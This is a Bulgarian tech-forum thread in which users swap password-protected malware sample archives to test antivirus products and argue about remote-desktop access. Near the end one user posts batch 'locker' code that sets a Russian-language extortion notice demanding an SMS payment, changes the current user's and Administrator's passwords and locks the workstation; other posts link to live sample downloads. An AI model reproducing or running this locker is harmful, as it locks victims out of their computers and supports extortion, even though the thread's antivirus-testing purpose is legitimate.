Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции,откриване на нови заплахи - част 15

Featured Replies

 Преведи си първо названието. Касперски винаги е реагирал на такива програми. Може би заради това си поведение досега не съм успял без знанието на потребител да вляза в компютър защитен с Касперски чрез отдалечен достъп.  :)

Що не се съгласи? Ще влезеш без проблем...

NIS не се и обажда при такава връзка...

  • Отговори 2,7k
  • Прегледи 145,2k
  • Създадено
  • Последен отговор

Усещам на къде биеш, ако искаш влез в моя компютър имам инсталиран само НИС.... ако искаш IP пиши на ЛС.

Предполагам знаеш как е ставало това трикче, с някогашното влизане и се чудя още ли не сте го разбрали...? За жалост в BG много от интернет техниците и техниците в сервизите си позволяват да правят подобни магарии т.е да си оставят вратички за посещение ! Имам много познати в бранша, които са си позволявали подобни волности

;)

 

А и след 100 питания и предупреждения на човек му писва да мисли и си казва я да забраня, че да спре да ме пита тази иначе интелигентна програма.... айде да не влизаме в полемики

 

 

Работата ми изобщо не свързана с компютри, за разлика от много потребители от тук. Компютър виждам 17:00ч., когато се прибирам вкъщи.

Не ме бъркай с твойте познати от бранша.

Редактирано от nikval (преглед на промените)

hUstlе по-подразбиране опцията за отдалечен контрол е налична в ХР 7Ult Pro след всяка преинсталация заглеждам там. При жена ми с оригинална версия на Тошиба опцията е налична. При ай пи адрес и име за вход и включена опция никакъв проблем да се влезе.Това е дупка и да се криеме и измисляме няма смисъл!

В момента не съм сложил НИС, когато го сложа ще ти дам айпи, за да влезеш. И повярвай ми няма защо да се крия :)

hUstlе ето ти нещо за домашно.

 

Виж IP-то и провери от коя държава е.

И този ли компютър съм  ремонтирал в сервиза, в който работя според теб?

 

http://www.youtube.com/watch?v=JCkaRsfZHS8&feature=youtu.be

 

User-a и дължината на паролата съм ги скрил

Редактирано от nikval (преглед на промените)

В момента не съм сложил НИС, когато го сложа ще ти дам айпи, за да влезеш. И повярвай ми няма защо да се крия :)

 

Ти пак не четеш

 

Предполагам знаеш как е ставало това трикче, с някогашното влизане и се чудя още ли не сте го разбрали...?

За жалост в BG много от интернет техниците и техниците в сервизите си позволяват да правят подобни магарии т.е да си оставят вратички за посещение !

 

Пиша ти следното

 

hUstlе по-подразбиране опцията за отдалечен контрол е налична в ХР 7Ult Pro след всяка преинсталация заглеждам там. При жена ми с оригинална версия на Тошиба опцията е налична. При ай пи адрес и име за вход и включена опция никакъв проблем да се влезе.Това е дупка и да се криеме и измисляме няма смисъл!

 

 

 И какво да доказвам и на кого? И защо най-вече? Включи си отметката,дай на някой ай пи то си и име за вход и т.н и тогава пиши. Това е пробвано,пробвано. Лошото е,че хората не слагат пароли на компютрите си или пък са името ив като потребител,парола или подобно. Писахме в темата още тогава и клипове правихме и т.н. 

hUstlе ето ти нещо за домашно.

 

Виж IP-то и провери от коя държава е.

 

http://www.ip-tracker.org/locator/ip-lookup.php?ip=77.76.67.5

 

Публикувано изображение

Сканирах с каквото се сетих и отстраних класифицираните - ето останаха последните 19 от двата архива  http://dox.bg/files/dw?a=6ed2c0e372

 

Вероятно те ще са и най-интересни - смятам да ги стартирам поединично.  Nikssi, не искам клипове - какъвто и резултат с две думи да напишеш - ще ми е по-интересно.Двата ти клипа са 87 минути....  Avira , Hitman и MBAM нищо не класифицират все още - за тези 19... P.S.  Немците ме засипаха с ъпдейти - току що получих нови 17, а уж е почивен ден...  Явно зависи и от създадени "закачки" за програмата им.

Изпостартирах ги - Privatefirewall все си блокира.  Допусна 3 вписвания на троянци и после продължава да блокира следващите им стъпки.17 от 19-те са опасни и вредоносни - видно от отреагирането на един приличен хипс. Авира бе безучастна - но това все пак бе безплатната им версия.  Не се наложи преход към свеж Win. Ако бях пробвал с RIS 23 - не зная дали би издържал на подобен реален терор. Не ми се мотае с логове, снимки и клипове.

Един троянец  dox.bg/files/dw?a=4782661546 засичат го само най-добрите :clown:

 

Паролата на архива е 123

Относно файла 2668E0CW.bat

Hello, This is a batch file for invoking a password lock on the workstation (equivalent to winkey+l)y If the batch file was intended for use, kindly inform us and we will try to revoke the detection. If the file is of unknown origin, it is possible the system has been compromised by unauthorized users. Best regards, -------- F-Secure Security Labs

 

 

Днес, при отваряне на архива с avast! с настройки да лови PuP

 

Публикувано изображение

 

При изключване на avast!, разархивиране на bip.zip и сканиране на папката

 

Публикувано изображение

ШЪ вЪ замоля да не слагате различни пароли от тази, която е приета за темата:

infected

В по-късен етап за да тествам заразите с нови дефиниции, трябва да правя специално зарди вас .txt с пояснения кой архив с коя парола беше!

Объркващо е!

Редактирано от angel* (преглед на промените)

ШЪ вЪ замоля да не слагате различни пароли от тази, която е приета за темата:
infected

В по-късен етап за да тествам заразите с нови дефиниции, трябва да правя специално зарди вас .txt с пояснения кой архив с коя парола беше!

Объркващо е!

 

Хей мен ноу факинг проблъм , но моите архиви си вървят с паролата :rap: та не е нужно да я запаметяваш където и да било.

Хей мен ноу факинг проблъм , но моите архиви си вървят с паролата :rap: та не е нужно да я запаметяваш където и да било.

 

Ман, не се отнася за тебе! :clown:

Събирам заразите в папка и след време ги тествам отново и като разархивирам се почва едно .... хммммммм ....123 ли беше, звездички ли беше, лунички ли беше ....инфектед ли беше ... :ph34r:

тука байду 100% копира касперски.

Бай Кихчо сигурн ги лови и 2 - та. Мариански нали така?

Редактирано от vasilevsa (преглед на промените)

Ми нормално, те китайците като не могат да измисля, копират. Жалка работа.

Ами все пак са си платили чинно, а ние ползваме безплатен касперски с последни дефиниции на китайски. ;) 

тука байду 100% копира касперски.

Бай Кихчо сигурн ги лови и 2 - та. Мариански нали така?

да, с деф. на бита

За тестове

 

 

 

pass: sg

vir на exe

Кингчо ги класифицира половината, после включих и облака на Hitman - заради останалите, а това  ме озадачи https://www.virustotal.com/bg/file/ed68edb214479be141bdc2fe62ea2c0347eae628cb8c13c44b68c8daee8b6563/analysis/1367939297/

Пробвах да го стартирам, но то не искаше да стартира - нямал съм "права за достъп"... Накрая не разбрах защо е уж вредоносно... То тук сме толкова много "спамери", "профани" и т.н. Да си пробвал всичкия защитен софтуер в света и пак нищо да не разбираш си е нещо нормално...

Код за локер

 

reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem" /f /v "legalnoticecaption" /t REG_SZ /d "Внимание!" 

reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem" /f /v "legalnoticetext" /t REG_SZ /d "Компьютер заблокирован !!!  В связи с несанкционированным доступом к ресурсам содержащим элементы порнографии и пидофилии. Для разблокировка компьютера отправте SMS на номер 5565 с текстом Unlock . В ответ на SMS, придет сообщение с паролем для разблокировки компьютера!" 
reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /f /v "LegalNoticeCaption" /t REG_SZ /d "Внимание!" 
reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /f /v "LegalNoticeText" /t REG_SZ /d "Компьютер заблокирован !!!  В связи с несанкционированным доступом к ресурсам содержащим элементы порнографии и пидофилии. Для разблокировка компьютера отправте SMS на номер 5565 с текстом Unlock . В ответ на SMS, придет сообщение с паролем для разблокировки компьютера!" 
net user %username% "Julia_HuliYa" 
net user Администратор "Julia_HuliYa" 
RUNDLL32.exe USER32.dll,LockWorkStation 

 

Си сложа телефона да ми пращате съобщения  ;)

Архивирана тема

Темата е твърде стара и е архивирана. Не можете да добавяте нови отговори в нея, но винаги можете да публикувате нова тема, в която да продължи дискусията. Регистрирайте се или влезте във вашия профил за да публикувате нова тема.

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.